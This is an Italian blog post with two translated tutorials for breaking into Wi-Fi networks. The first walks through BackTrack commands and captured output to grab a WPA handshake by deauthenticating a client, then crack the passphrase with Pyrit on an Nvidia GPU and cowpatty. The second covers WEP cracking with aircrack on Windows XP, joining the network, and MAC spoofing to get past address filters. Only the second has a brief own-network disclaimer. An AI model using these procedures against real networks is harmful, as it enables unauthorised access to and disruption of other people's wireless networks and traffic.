Hacking WPA con CUDA (nVidia)

L’utente alex88 ci ha gentilmente fornito la traduzione del tutorial trovato sul forum del bt4 per cracckare con il cuda delle schede nvidia le password wpa. Questo permette di utilizzare il processore delle schede video nvidia allo stesso modo di quando si craccka gli md5 mediante vari programmi.
(il crack si basa su un dizionario, dal quale viene creata una hash table)

[QUI] il 3D ufficiale

Premessa: dovete avere una scheda nvidia che supporta il CUDA http://en.wikipedia.org/wiki/CUDA#Supported_GPUs e il backtrack 4 (per ora beta) in quanto include già il supporto per esso.
Per prima cosa installiamo il modulo nvidia appena finito il boot (non fate startx)
Codice:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL cuda-set-env.sh nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL

Ci verrà fuori un po di linee e alla fine ci verrà richiesto di riconfigurare il nostro xorg.conf, scegliamo no, quindi installiamo i driver
Codice:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a

ora visto che il nostro file di config è stato completamente rifatto, facciamone uno nuovo con:
Codice:
root@bt:~# X -configure

questo crea il file di config nella nostra home e dovremmo copiarlo a mano:
Codice:
root@bt:~# cp xorg.conf.new /etc/X11/xorg.conf

ora dovremmo essere in grado di poter avviare il nostro window manager e iniziamo subito a testare le differenze tra processore e cuda:
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID…
Available cores: ‘Standard CPU’, ‘Nvidia CUDA’
Testing CPU-only core ‘Standard CPU’ (4 CPUs)… 1294.58 PMKs/s

Testing GPU core ‘Nvidia CUDA’ (Device ‘GeForce 8800 GT’)… 5409.43 PMKs/

come vedete la gpu va 5 volte tanto la cpu.
Ora quindi possiamo iniziare catturando un handshake (volendo si può restringere il campo aggiungendo “-c #CANALE” a airodump per poter sintonizzare la scheda ad un solo canale
Codice:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~#airodump-ng -w cudacapture mon0

Se non troviamo hanshake deautentichiamo qualcuno in maniera di catturarlo alla sua riconnessione:
Codice:
root@bt:~# aireplay-ng -0 10 -a (mac dell’Access Point) -c (mac del client) mon0
01:13:28 Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]

ora possiamo verificare di aver catturato l’handshake,
Codice:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

# BSSID ESSID Encryption

1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (34 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data – WEP or WPA
6 00:1A:70:83:B0:1C linksys None (0.0.0.0)
7 00:13:46:44:A5:CE default WEP (11 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data – WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data – WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)

Index number of target network ?

ora nella nostra home possiamo scaricare un dizionario:
Codice:
root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
–2009-02-11 01:17:53– http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving http://www.outpost9.com… 12.180.200.208
Connecting to http://www.outpost9.com|12.180.200.208|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip’

100%[================================================================================>] 3,283,473 268K/s in 9.2
root@bt:~# unzip dic-0294.zip
Archive: dic-0294.zip
inflating: dic-0294.txt

Togliamo quello che non ci serve:
Codice:
root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst
597532 wpa.lst

Ora inizia il cracckaggio vero e proprio:
Codice:
root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#

digitiamo il nostro essid
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -e (NOSTRO ESSID) create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Created ESSID ‘(NOSTRO ESSID)’

importiamo il dizionario precedentemente creato
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Importing from ‘/root/wpa.lst’
597532 lines read. All done.

e iniziamo la generazione della tabella:
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Using default core ‘Nvidia CUDA’ (Device ‘GeForce 8800 GT’)
Working on ESSID ‘ddwrt1’
Reading unit ‘1ec5841a057928e33972489b461cb914’ (54072 passwords buffered)
All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit ‘6c9303c848ed6a4473221229d4387934′ (54996 passwords buffered)
All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit ’70ded804144475dbc58b982625483821’ (56076 passwords buffered)
All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)…

…Reading unit ‘f384ca460307a079503db313ece6806e’ (53808 passwords buffered)
All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit ‘1bf464713cab79da5efc8503e8f28812’ (17496 passwords buffered)
All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)

Batchprocessing done.

Esportiamo il file per cowpatty (simile al cracked di aircrack ma più veloce):
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -e (NOSTRO ESSID) -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting to ‘cow.out’…
4656218 entries written. All done.

Ora iniziamo la ricerca della chiave:
Codice:
root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s (NOSTRO ESSID) -r /root/cudacapture-01.cap
cowpatty 4.3 – WPA-PSK dictionary attack.

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123

Questo è la velocità con l’hash file creato dalla scheda video:
Codice:
[4656217 passphrases tested in 24.84 seconds: 187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#

e questo quello senza il file:
Codice:
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap

27824 passphrases tested in 84.98 seconds: 327.40 passphrases/second

Vorrei scusarmi con wifi-ita e colgo l’occasione per ringraziarli…a volte mi dimentico di postare le fonti..scusate per il ritardo..

Fonte: wifi-ita

Crackare una rete wireless(wep) con aircrack: procedura in windows xp

image

Disclaimer

Questa guida presuppone che la rete che state craccando sia di vostra proprietà. Entrare nelle reti altrui in italia e penso anche negli altri paesi del mondo è reato penale. In definitiva, utilizzate la guida quì proposta solo a scopo educativo e solo sulla vostra rete casalinga (e non su quelle di altre).

Cos’è aircrack ?

aircrack è un insieme di strumenti per la verifica di reti wireless:

  • airodump: 802.11 sniffer
  • aireplay: 802.11 generatore di pacchetti
  • aircrack: cracker per chiavi statiche WEP e WPA-PSK
  • airdecap: decifra file catturati WEP/WPA

Prerequisiti

  • Scaricate ed installate Aircrack
  • Se utilizzate “Winaircrack” (Aircrack con interfaccia grafica) copiate i files peek.dll e peek5.sys all’interno della cartella di Aircrack
  • Avrete anche bisogno di installare dei nuovi driver per il vostro adattatore di rete: i driver originali non sono stati pensati per fare cose simili (per trovare dei driver che possano fare al caso vostro visitate il sito WildPacket)
  • Per installare i nuovi driver aprite “clic destro su Risorse del Computer, Proprietà, Gestione Periferiche, clic destro sul vostro adattatore di rete, Proprietà, Driver, Aggiorna Driver, Installa da un elenco o percorso specifico” scegliete il percorso in cui avete scaricato i driver. Assicuratevi infine che il vostro adattatore di rete sia ora compatibile col tutto

Procedura

Il primo passo è ovviamente quello di trovare una rete wireless.

Digitate “Airodump” nel prompt di DOS (Start, esegui, cmd). Vi comparirà una finestra contenete le schede di rete trovate sulla vostra macchina. Notate che accanto al nome delle schede di rete è presente un numero identificativo. Ad esempio:

22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

In questo caso digitate 22, il numero identificativo della scheda che ci interessa utilizzare (in genere è quella che riporta una qualche identificazione del tipo “802.11x”).

Ora vi viene chiesto di indicare il chipset utilizzato dal vostro adattatore di rete. Ad esempio:

Interface types: ‘o’ = HermesI/Realtek

‘a’ = Aironet/Atheros

Selezionate il vostro, in questo caso scegliendo “o” oppure “a”. Per sapere quale chipset è montato sulla vostra scheda di rete potete dare uno sguardo al sito: http://www.linux-wlan.org/

Ora vi sarà richiesto di inserire il numero del canale da controllare (sniffing). In genere per gli USA e l’UK utilizzate l’11, per l’Europa il 14. Se volete fare una scansione di tutti i canali utilizzate lo zero.

In seguito il programma chiederà di digitare il nome da dare al file che verrà creato a partire dalla scansione del canale. Digitate il nome che vi pare, ad esempio “WEP1”.

Ora Aircrack vi chiederà se salvare gli interi pacchetti catturati o soltanto gli IV. Per craccare una chiave WEP vi basta salvare semplicemente gli IV (il che vi farà risparmiare diverso spazio sull’hard disk, quindi digitate “y”).

Adesso vedrete una schermata simile:

image

BSSID = l’indirizzo MAC dell’Access Point

PWR = indica la forza del segnale che si sta ricevendo

<!–
google_ad_client = “pub-1001936259289583”;
/* 336×280, creato 02/03/09 */
google_ad_slot = “4025636947”;
google_ad_width = 336;
google_ad_height = 280;
// –> <!–
window.google_render_ad();
// –>

BEACONS = sono pacchetti “in chiaro” che l’Access Point trasmette sostanzialmente per dire “sono un access point, collegati a me”

DATA = è quello che ci interessa: sono gli IV che Aircrack utilizzerà per trovare
la password WEP

ENC = il tipo di incapsulamento: WEP, WPA, OPEN…

ESSID = Il nome della rete Wireless. L’SSID è una sorta di identificativo della rete. Se ad esempio l’Access Point ha come SSID il nome “pippo” allora le schede wireless che ci si vogliono connettere devono impostare a loro volta come SSID “pippo”.

Nella seconda parte dell’immagine sopra vediamo i vari client che stanno “dialogando” con l’Access Point”, più esattamente vediamo i vari indirizzi MAC dei client. Quest’informazione può risultare utile in seguito quindi annotatevi gli indirizzi MAC. Questo perché in un Access Point è possibile impostare un filtro di indirizzi MAC: in questo modo soltanto le schede di rete che hanno un indirizzo MAC riportato nel filtro potranno collegarsi. Ciò significa che anche se possediamo la chiave WEP non possiamo accedere all’Access Point a meno che l’indirizzo MAC del nostro adattatore di rete non sia stato impostato nel filtro dell’Access Point. Ad ogni modo un caso simile sarà trattato dopo, per il momento non preoccupiamocene.

Aicrack continuerà a collezionare IV finché non lo fermate. Più IV scaricate e più probabilità avete di decifrare la chiave. Non c’è un riferimento esatto del tipo “lunghezza chiave = tot numero di IV da scaricare”. In linea generale prendete per buono che per trovare una chiave WEP da 40 bit potete scaricare dai 250.000 ai 400.000 IV: Aircrack dovrebbe trovare la chiave in pochi secondi. Ad ogni modo vi conviene cominciare con pochi IV infatti, se questi non bastano ad Aircrack per trovare
la chiave WEP, non dovrete ricominciare tutto da zero: basterà che quando vi verrà chiesto il nome che volete dare al file inseriate lo stesso nome che avevate già utilizzato in precedenza (in tal modo il file non verrà sovrascritto ma verrà invece “continuato”, cioè incrementato). Per una chiave da 104 bit collezionate circa 2.000.000 di IV: a volte ne bastano molti meno (anche se il programma impiegherà più tempo per trovare la chiave), altre volte purtroppo dovrete scaricarne di più…

Quando sarete soddisfatti del numero di IV collezionati premete “CTRL + C” per fermare il programma.

Scrivendo “Aircrack-ng” nel prompt vi verrà mostrata la lista dei parametri che è possibile utilizzare. Supponiamo di aver scaricato intorno ai 400.000 IV, in genere sufficienti per scovare una chiave WEP da 40 bit. Digitiamo allora il comando “aircrack-ng -n 64 WEP1.ivs”. Con il parametro “-n 64” diciamo al programma che la chiave ha una lunghezza massima di 64 bit e di non provare quindi oltre (anche perché, come già ricordato, non abbiamo ancora scaricato abbastanza IV per lunghezze di chiave maggiori). Il parametro “-f” che in questo esempio non abbiamo utilizzato serve per specificare l’intensità dell’attacco brute-force che di default è a livello 2: volendo potete specificare un livello maggiore, ad esempio 5.

Da notare anche l’estensione del file (WEP1.ivs): sarà *.ivs se avevate deciso di salvare soltanto gli IV, sarà *.cap se avevate deciso di salvare gli interi pacchetti catturati.

Se avrete fortuna il programma vi restituirà un messaggio di “KEY FOUND” seguito dal nome della chiave.

Ora che avete la chiave utilizzatela proprio come se doveste connettervi ad una vostra rete “domestica”. Se l’SSID dell’Access Point è abilitato seguite questa spiegazione; in caso contrario vi rimando all’ultimo paragrafo di questa guida.

Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili. Se l’SSID è abilitato (è visibile), questo vi appare nella finestra delle connessioni disponibili (e in genere potete anche vedere se utilizza il WPA o meno come sistema di cifratura). Fate doppio clic sull’icona della connessione ed inserite la password che avete trovato in precedenza: è fatta.

Perchè non riesco a collegarmi all’ AP ?

Se non riuscite a collegarvi la causa può essere:

  1. L’access Point utilizza un filtro per indirizzi MAC
  2. Siete troppo lontani dall’Access Point
  3. La chiave che avete trovato è errata

Vediamo i motivi nel dettaglio:

  1. L’AP utilizza un filtro per indirizzi MAC. In precedenza vi era stato detto di annotarvi gli indirizzi MAC che stavano dialogando con l’AP. Ora la cosa più semplice da fare è:
    – Aspettare che uno degli indirizzi MAC annotati in precedenza si scolleghi
    – Cambiare il nostro indirizzo MAC in modo da renderlo uguale a quello che si è appena scollegato (MAC Spoofing)
    – Entrare nell’Access Point :-) .
  2. Siete troppo lontani dall’Access Point. Bisogno di spiegazioni??? Avvicinatevi…
  3. La chiave che avete trovato è errata. O meglio… è possibile che sia corretta: assicuratevi di averla scritta in modo giusto. In particolar modo assicuratevi di non aver scritto eventuali zeri (“0”) come delle “O” in quanto non ci possono essere delle “O”!

Se l’SSID dell’Access Point è disabilitato nessun problema. Voi conoscete già qual è, vi è stato rivelato da Aircrack: vedi immagine sopra, ESSID. Quello che dovete fare è semplicemente inserire l’SSID trovato nelle impostazioni di connessione.
Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili, Modifica impostazioni avanzate, Reti senza fili, Aggiungi: scrivete l’SSID così come lo ha trovato Aircrack, l’autenticazione alla rete è normalmente APERTA > scegliere la cifratura WEP, togliere il segno di spunta dalla voce “la chiave sarà fornita automaticamente” ed inserire invece la chiave WEP che avete trovato grazie ad Aircrack (nota: inserite la chiave tutta di seguito, senza i due punti (“:”) di separazione).

Quanti IVs ci vogliono per crackare il WEP ?

Crackare il WEP non è una scienza esatta. Il numero di IVs richiesti dipende dalla lunghezza della chiave WEP e dalla tua fortuna. Di solito, una chiave WEP 40-bit si può crackare con 300.000 IVs, e una chiave WEP da 104-bit con 1.000.000 di IVs; se sei sfigato, puoi avere bisogno di 2 milioni di IVs, o anche più.

Non c’è modo di sapere quanto è lunga una chiave WEP: questa informazione è segreta e non viene diffusa, nè nelle frame di gestione nè in quelle dati; quindi, airodump non può indicare la lunghezza della chiave. Perciò è consigliabile eseguire aircrack 2 volte: quando hai 250.000 IVs, lancia aircrack con l’opzione “-n 64″ per crackare il WEP a 40-bit. Quindi se non trovi la chiave, rilancia aircrack (senza l’opzione -n) per crackare la chiave WEP a 104-bit.